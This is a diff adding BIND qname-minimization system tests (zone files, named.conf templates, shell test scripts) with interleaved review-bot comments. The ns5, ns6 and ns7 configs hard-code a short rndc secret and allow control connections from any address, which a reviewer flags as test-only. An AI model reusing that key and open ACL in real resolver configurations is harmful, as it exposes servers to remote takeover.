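Review bot: `create_response` parses the datagram with `dns.message.from_wire(msg)` and indexes `m.question[0]` with no error handling, so one malformed or question-less packet on the listening socket raises out of the `select` loop and terminates the responder mid-test. The main loop already has an `if rsp: … else: print("NO RESPONSE")` branch, so returning `None` for unparseable input fits the existing shape, as in the fence below. Separately, `logquery` calls `f.write("%s %s\n", type, qname)`, which would raise `TypeError` if it were ever called; it should be `f.write("%s %s\n" % (type, qname))` or be dropped, since `create_response` logs inline. The ans3/ans.py loop earlier in this diff has the same `if rsp:` shape, though the opening of its `create_response` is not visible here.

```python
def create_response(msg):
    # Reject datagrams that are not parseable DNS queries instead of
    # letting the exception escape into the select loop.
    try:
        m = dns.message.from_wire(msg)
    except dns.exception.DNSException:
        return None
    if not m.question:
        return None
    qname = m.question[0].name.to_text()
    # … unchanged: suffix dispatch and response construction …
```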
@@ -0,0 +1,20 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f ns*/named.conf
+rm -f */named.memstats
+rm -f */named.run
+rm -f dig.out.*
+rm -f ns*/named.lock
+rm -f ans*/query.log*
+rm -f query*.log
diff --git a/bin/tests/system/qmin/ns1/named.conf.in b/bin/tests/system/qmin/ns1/named.conf.in
new file mode 100644
index 0000000..e366cca
--- /dev/null
+++ b/bin/tests/system/qmin/ns1/named.conf.in
@@ -0,0 +1,32 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS1
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ dnssec-validation no;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
diff --git a/bin/tests/system/qmin/ns1/root.db b/bin/tests/system/qmin/ns1/root.db
new file mode 100644
index 0000000..325f607
--- /dev/null
+++ b/bin/tests/system/qmin/ns1/root.db
@@ -0,0 +1,41 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 20
+. IN SOA wpk.isc.org. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 2 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+ip6.arpa. NS ns2.good.
+
+good. NS ns2.good.
+ns2.good. A 10.53.0.2
+
+bad. NS ns2.bad.
+ns2.bad. A 10.53.0.2
+
+slow NS ns2.slow.
+ns2.slow. A 10.53.0.2
+
+ugly. NS ns2.ugly.
+ns2.ugly. A 10.53.0.2
+
+fwd. NS ns2.fwd.
+ns2.fwd. A 10.53.0.2
+
+$TTL 2
+stale. NS ns2.stale.
+ns2.stale. A 10.53.0.2
diff --git a/bin/tests/system/qmin/ns5/named.conf.in b/bin/tests/system/qmin/ns5/named.conf.in
new file mode 100644
index 0000000..7d9e9e6
--- /dev/null
+++ b/bin/tests/system/qmin/ns5/named.conf.in
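Review bot: The `slow` delegation is written without a trailing dot (`slow NS ns2.slow.`), while every other delegation owner in this file is fully qualified (`good.`, `bad.`, `ugly.`, `fwd.`, `stale.`). It presumably still expands to `slow.` because the zone origin is the root, but that depends on the implicit origin and would silently change meaning if a `$ORIGIN` line were ever added above it. Writing `slow. NS ns2.slow.` keeps the file consistent.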
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS5
+
+options {
+ query-source address 10.53.0.5;
+ notify-source 10.53.0.5;
+ transfer-source 10.53.0.5;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.5; };
+ listen-on-v6 { none; };
+ recursion yes;
+ qname-minimization disabled;
+ querylog yes;
+ resolver-query-timeout 30;
+ dnssec-validation no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
diff --git a/bin/tests/system/qmin/ns6/named.conf.in b/bin/tests/system/qmin/ns6/named.conf.in
new file mode 100644
index 0000000..36651f2
--- /dev/null
+++ b/bin/tests/system/qmin/ns6/named.conf.in
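Review bot: The `controls` statement accepts rndc connections from `allow { any; }` and authenticates them with the short literal secret `"1234abcd8765"` committed in the file; ns6/named.conf.in and ns7/named.conf.in repeat both lines. That is workable for a fixture bound to the 10.53.0.x test addresses, but nothing in the file says so, and templates like this tend to get copied into other setups. I would add a comment above the key such as `// Test-only rndc key; must never be used outside the system test environment.` If the harness always connects from the test addresses (not visible in this hunk), the ACL could also be narrowed to them.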
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS6
+
+options {
+ query-source address 10.53.0.6;
+ notify-source 10.53.0.6;
+ transfer-source 10.53.0.6;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.6; };
+ listen-on-v6 { none; };
+ recursion yes;
+ qname-minimization strict;
+ querylog yes;
+ resolver-query-timeout 30;
+ dnssec-validation no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
diff --git a/bin/tests/system/qmin/ns7/named.conf.in b/bin/tests/system/qmin/ns7/named.conf.in
new file mode 100644
index 0000000..32b8b48
--- /dev/null
+++ b/bin/tests/system/qmin/ns7/named.conf.in
@@ -0,0 +1,51 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS7
+
+options {
+ query-source address 10.53.0.7;
+ notify-source 10.53.0.7;
+ transfer-source 10.53.0.7;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.7; };
+ listen-on-v6 { none; };
+ recursion yes;
+ qname-minimization relaxed;
+ querylog yes;
+ resolver-query-timeout 30;
+ dnssec-validation no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "fwd." IN {
+ type forward;
+ forwarders {
+ 10.53.0.2;
+ };
+ forward only;
+};
diff --git a/bin/tests/system/qmin/prereq.sh b/bin/tests/system/qmin/prereq.sh
new file mode 100644
index 0000000..aa97ae2
--- /dev/null
+++ b/bin/tests/system/qmin/prereq.sh
@@ -0,0 +1,31 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+if test -n "$PYTHON"
+then
+ if $PYTHON -c "import dns" 2> /dev/null
+ then
+ :
+ else
+ echo_i "This test requires the dnspython module." >&2
+ exit 1
+ fi
+else
+ echo_i "This test requires Python and the dnspython module." >&2
+ exit 1
+fi
+
+exit 0
diff --git a/bin/tests/system/qmin/setup.sh b/bin/tests/system/qmin/setup.sh
new file mode 100644
index 0000000..8af413f
--- /dev/null
+++ b/bin/tests/system/qmin/setup.sh
@@ -0,0 +1,20 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
+copy_setports ns6/named.conf.in ns6/named.conf
+copy_setports ns7/named.conf.in ns7/named.conf
diff --git a/bin/tests/system/qmin/tests.sh b/bin/tests/system/qmin/tests.sh
new file mode 100755
index 0000000..728d535
--- /dev/null
+++ b/bin/tests/system/qmin/tests.sh
@@ -0,0 +1,541 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" +CLEANQL="rm -f ans*/query.log" +status=0 +n=0 + +n=$((n+1)) +echo_i "query for .good is not minimized when qname-minimization is off ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.5 flush +$DIG $DIGOPTS icky.icky.icky.ptang.zoop.boing.good. @10.53.0.5 > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "icky.icky.icky.ptang.zoop.boing.good. 1 IN A 192.0.2.1" dig.out.test$n > /dev/null || ret=1 +sleep 1 +cat << __EOF | $DIFF ans2/query.log - > /dev/null || ret=1 +ADDR icky.icky.icky.ptang.zoop.boing.good. +ADDR ns3.good. +ADDR ns3.good. +ADDR a.bit.longer.ns.name.good. +ADDR a.bit.longer.ns.name.good. +__EOF +echo "ADDR icky.icky.icky.ptang.zoop.boing.good." | $DIFF ans3/query.log - > /dev/null || ret=1 +echo "ADDR icky.icky.icky.ptang.zoop.boing.good." | $DIFF ans4/query.log - > /dev/null || ret=1 +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .bad is not minimized when qname-minimization is off ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.5 flush +$DIG $DIGOPTS icky.icky.icky.ptang.zoop.boing.bad. @10.53.0.5 > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "icky.icky.icky.ptang.zoop.boing.bad. 
1 IN A 192.0.2.1" dig.out.test$n > /dev/null || ret=1 +sleep 1 +cat << __EOF | $DIFF ans2/query.log - > /dev/null || ret=1 +ADDR icky.icky.icky.ptang.zoop.boing.bad. +ADDR ns3.bad. +ADDR ns3.bad. +ADDR a.bit.longer.ns.name.bad. +ADDR a.bit.longer.ns.name.bad. +__EOF +echo "ADDR icky.icky.icky.ptang.zoop.boing.bad." | $DIFF ans3/query.log - > /dev/null || ret=1 +echo "ADDR icky.icky.icky.ptang.zoop.boing.bad." | $DIFF ans4/query.log - > /dev/null || ret=1 +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .slow is not minimized when qname-minimization is off ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.5 flush +$DIG $DIGOPTS icky.icky.icky.ptang.zoop.boing.slow. @10.53.0.5 > dig.out.test$n +sleep 5 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "icky.icky.icky.ptang.zoop.boing.slow. 1 IN A 192.0.2.1" dig.out.test$n > /dev/null || ret=1 +sleep 1 +cat << __EOF | $DIFF ans2/query.log - > /dev/null || ret=1 +ADDR icky.icky.icky.ptang.zoop.boing.slow. +ADDR ns3.slow. +ADDR ns3.slow. +ADDR a.bit.longer.ns.name.slow. +ADDR a.bit.longer.ns.name.slow. +__EOF +echo "ADDR icky.icky.icky.ptang.zoop.boing.slow." | $DIFF ans3/query.log - > /dev/null || ret=1 +echo "ADDR icky.icky.icky.ptang.zoop.boing.slow." | $DIFF ans4/query.log - > /dev/null || ret=1 +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .ugly is not minimized when qname-minimization is off ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.5 flush +$DIG $DIGOPTS icky.icky.icky.ptang.zoop.boing.ugly. @10.53.0.5 > dig.out.test$n +sleep 5 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "icky.icky.icky.ptang.zoop.boing.ugly. 
1 IN A 192.0.2.1" dig.out.test$n > /dev/null || ret=1 +sleep 1 +cat << __EOF | $DIFF ans2/query.log - > /dev/null || ret=1 +ADDR icky.icky.icky.ptang.zoop.boing.ugly. +ADDR ns3.ugly. +ADDR ns3.ugly. +ADDR a.bit.longer.ns.name.ugly. +ADDR a.bit.longer.ns.name.ugly. +__EOF +echo "ADDR icky.icky.icky.ptang.zoop.boing.ugly." | $DIFF ans3/query.log - > /dev/null || ret=1 +echo "ADDR icky.icky.icky.ptang.zoop.boing.ugly." | $DIFF ans4/query.log - > /dev/null || ret=1 +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .good is properly minimized when qname-minimization is in strict mode ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.6 flush +$DIG $DIGOPTS icky.icky.icky.ptang.zoop.boing.good. @10.53.0.6 > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "icky.icky.icky.ptang.zoop.boing.good. 1 IN A 192.0.2.1" dig.out.test$n > /dev/null || ret=1 +sleep 1 +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +ADDR a.bit.longer.ns.name.good. +ADDR a.bit.longer.ns.name.good. +ADDR ns2.good. +ADDR ns3.good. +ADDR ns3.good. +NS boing.good. +NS good. +NS zoop.boing.good. +__EOF +cat << __EOF | $DIFF ans3/query.log - > /dev/null || ret=1 +NS zoop.boing.good. +NS ptang.zoop.boing.good. +NS icky.ptang.zoop.boing.good. +__EOF +cat << __EOF | $DIFF ans4/query.log - > /dev/null || ret=1 +NS icky.ptang.zoop.boing.good. +NS icky.icky.ptang.zoop.boing.good. +ADDR icky.icky.icky.ptang.zoop.boing.good. 
+__EOF +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .good is properly minimized when qname-minimization is in relaxed mode ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.7 flush +$DIG $DIGOPTS icky.icky.icky.ptang.zoop.boing.good. @10.53.0.7 > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "icky.icky.icky.ptang.zoop.boing.good. 1 IN A 192.0.2.1" dig.out.test$n > /dev/null || ret=1 +sleep 1 +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +ADDR _.boing.good. +ADDR _.zoop.boing.good. +ADDR a.bit.longer.ns.name.good. +ADDR a.bit.longer.ns.name.good. +ADDR ns2.good. +ADDR ns3.good. +ADDR ns3.good. +__EOF +cat << __EOF | $DIFF ans3/query.log - > /dev/null || ret=1 +ADDR _.ptang.zoop.boing.good. +ADDR _.icky.ptang.zoop.boing.good. +__EOF +cat << __EOF | $DIFF ans4/query.log - > /dev/null || ret=1 +ADDR _.icky.icky.ptang.zoop.boing.good. +ADDR icky.icky.icky.ptang.zoop.boing.good. +__EOF +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .bad fails when qname-minimization is in strict mode ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.6 flush +$DIG $DIGOPTS icky.icky.icky.ptang.zoop.boing.bad. @10.53.0.6 > dig.out.test$n +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +sleep 1 +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +ADDR ns2.bad. +NS bad. +NS boing.bad. 
+__EOF +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .bad succeeds when qname-minimization is in relaxed mode ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.7 flush +$DIG $DIGOPTS icky.icky.icky.ptang.zoop.boing.bad. @10.53.0.7 > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "icky.icky.icky.ptang.zoop.boing.bad. 1 IN A 192.0.2.1" dig.out.test$n > /dev/null || ret=1 +sleep 1 +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +ADDR _.boing.bad. +ADDR _.zoop.boing.bad. +ADDR a.bit.longer.ns.name.bad. +ADDR a.bit.longer.ns.name.bad. +ADDR ns2.bad. +ADDR ns3.bad. +ADDR ns3.bad. +__EOF +cat << __EOF | $DIFF ans3/query.log - > /dev/null || ret=1 +ADDR _.ptang.zoop.boing.bad. +ADDR _.icky.ptang.zoop.boing.bad. +__EOF +cat << __EOF | $DIFF ans4/query.log - > /dev/null || ret=1 +ADDR _.icky.icky.ptang.zoop.boing.bad. +ADDR icky.icky.icky.ptang.zoop.boing.bad. +__EOF +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .ugly fails when qname-minimization is in strict mode ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.6 flush +$DIG $DIGOPTS icky.icky.icky.ptang.zoop.boing.ugly. @10.53.0.6 > dig.out.test$n +grep "status: SERVFAIL" dig.out.test$n > /dev/null || ret=1 +sleep 1 +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +ADDR ns2.ugly. +NS boing.ugly. +NS boing.ugly. +NS ugly. 
+__EOF +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) +$RNDCCMD 10.53.0.6 flush + +n=$((n+1)) +echo_i "query for .ugly succeeds when qname-minimization is in relaxed mode ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.7 flush +$DIG $DIGOPTS icky.icky.icky.ptang.zoop.boing.ugly. @10.53.0.7 > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "icky.icky.icky.ptang.zoop.boing.ugly. 1 IN A 192.0.2.1" dig.out.test$n > /dev/null || ret=1 +sleep 1 + +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +ADDR _.boing.ugly. +ADDR _.boing.ugly. +ADDR a.bit.longer.ns.name.ugly. +ADDR a.bit.longer.ns.name.ugly. +ADDR icky.icky.icky.ptang.zoop.boing.ugly. +ADDR ns2.ugly. +ADDR ns3.ugly. +ADDR ns3.ugly. +__EOF +echo "ADDR icky.icky.icky.ptang.zoop.boing.ugly." | $DIFF ans3/query.log - > /dev/null || ret=1 +echo "ADDR icky.icky.icky.ptang.zoop.boing.ugly." | $DIFF ans4/query.log - > /dev/null || ret=1 +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) +$RNDCCMD 10.53.0.7 flush + +n=$((n+1)) +echo_i "information that minimization was unsuccessful for .ugly is logged ($n)" +ret=0 +grep "success resolving 'icky.icky.icky.ptang.zoop.boing.ugly/A' after disabling qname minimization due to 'FORMERR'" ns7/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .slow is properly minimized when qname-minimization is on ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.6 flush +$DIG $DIGOPTS icky.icky.icky.ptang.zoop.boing.slow. @10.53.0.6 > dig.out.test$n +sleep 5 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "icky.icky.icky.ptang.zoop.boing.slow. 
1 IN A 192.0.2.1" dig.out.test$n > /dev/null || ret=1 +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +ADDR a.bit.longer.ns.name.slow. +ADDR a.bit.longer.ns.name.slow. +ADDR ns2.slow. +ADDR ns3.slow. +ADDR ns3.slow. +NS boing.slow. +NS slow. +NS zoop.boing.slow. +__EOF +cat << __EOF | $DIFF ans3/query.log - > /dev/null || ret=1 +NS zoop.boing.slow. +NS ptang.zoop.boing.slow. +NS icky.ptang.zoop.boing.slow. +__EOF +cat << __EOF | $DIFF ans4/query.log - > /dev/null || ret=1 +NS icky.ptang.zoop.boing.slow. +NS icky.icky.ptang.zoop.boing.slow. +ADDR icky.icky.icky.ptang.zoop.boing.slow. +__EOF +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .ip6.arpa succeeds and skips on proper boundaries when qname-minimization is on ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.6 flush +$DIG $DIGOPTS -x 2001:4f8::1 @10.53.0.6 > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.f.4.0.1.0.0.2.ip6.arpa. 1 IN PTR nee.com." dig.out.test$n > /dev/null || ret=1 +sleep 1 +grep -v ADDR ans2/query.log > ans2/query.log.trimmed +cat << __EOF | $DIFF ans2/query.log.trimmed - > /dev/null || ret=1 +NS 1.0.0.2.ip6.arpa. +NS 8.f.4.0.1.0.0.2.ip6.arpa. +NS 0.0.0.0.8.f.4.0.1.0.0.2.ip6.arpa. +NS 0.0.0.0.0.0.8.f.4.0.1.0.0.2.ip6.arpa. +NS 0.0.0.0.0.0.0.0.8.f.4.0.1.0.0.2.ip6.arpa. +PTR 1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.f.4.0.1.0.0.2.ip6.arpa. +__EOF +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for multiple label name skips after 7th label ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.6 flush +$DIG $DIGOPTS more.icky.icky.icky.ptang.zoop.boing.good. 
@10.53.0.6 > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "more.icky.icky.icky.ptang.zoop.boing.good. 1 IN A 192.0.2.2" dig.out.test$n > /dev/null || ret=1 +sleep 1 +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +ADDR a.bit.longer.ns.name.good. +ADDR a.bit.longer.ns.name.good. +ADDR ns2.good. +ADDR ns3.good. +ADDR ns3.good. +NS boing.good. +NS good. +NS zoop.boing.good. +__EOF +cat << __EOF | $DIFF ans3/query.log - > /dev/null || ret=1 +NS zoop.boing.good. +NS ptang.zoop.boing.good. +NS icky.ptang.zoop.boing.good. +__EOF +# There's no NS icky.icky.icky.ptang.zoop.boing.good. query - we skipped it. +cat << __EOF | $DIFF ans4/query.log - > /dev/null || ret=1 +NS icky.ptang.zoop.boing.good. +NS icky.icky.ptang.zoop.boing.good. +ADDR more.icky.icky.icky.ptang.zoop.boing.good. +__EOF +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "qname minimization is disabled when forwarding ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.7 flush +$DIG $DIGOPTS a.bit.longer.ns.name.fwd. @10.53.0.7 > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "a.bit.longer.ns.name.fwd. 1 IN A 10.53.0.4" dig.out.test$n >/dev/null || ret=1 +sleep 1 +cat << __EOF | $DIFF ans2/query.log - > /dev/null || ret=1 +ADDR a.bit.longer.ns.name.fwd. +__EOF +for ans in ans2; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "qname minimization resolves unusual ip6.arpa. names ($n)" +ret=0 +$CLEANQL +$DIG $DIGOPTS test1.test2.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.9.0.9.4.1.1.1.1.8.2.6.0.1.0.0.2.ip6.arpa. 
txt @10.53.0.7 > dig.out.test$n 2>&1 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +# Expected output in dig.out.test$n: +# ;; ANSWER SECTION: +# test1.test2.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.9.0.9.4.1.1.1.1.8.2.6.0.1.0.0.2.ip6.arpa. 1 IN TXT "long_ip6_name" +grep 'ip6\.arpa.*TXT.*long_ip6_name' dig.out.test$n > /dev/null || ret=1 +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Below are test cases for GL #2665: The QNAME minimization (if enabled) should +# also occur on the second query, after the RRsets have expired from cache. +# BIND will still have the entries in cache, but marked stale. These stale +# entries should not prevent the resolver from minimizing the QNAME. +# We query for the test domain a.b.stale. in all cases (QNAME minimization off, +# strict mode, and relaxed mode) and expect it to behave the same the second +# time when we have a stale delegation structure in cache. +n=$((n+1)) +echo_i "query for .stale is not minimized when qname-minimization is off ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.5 flush +$DIG $DIGOPTS @10.53.0.5 txt a.b.stale. > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "a\.b\.stale\..*1.*IN.*TXT.*peekaboo" dig.out.test$n > /dev/null || ret=1 +sleep 1 +echo "TXT a.b.stale." | $DIFF ans2/query.log - > /dev/null || ret=1 +echo "TXT a.b.stale." | $DIFF ans3/query.log - > /dev/null || ret=1 +test -f ans4/query.log && ret=1 +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .stale is properly minimized when qname-minimization is in strict mode ($n)" +ret=0 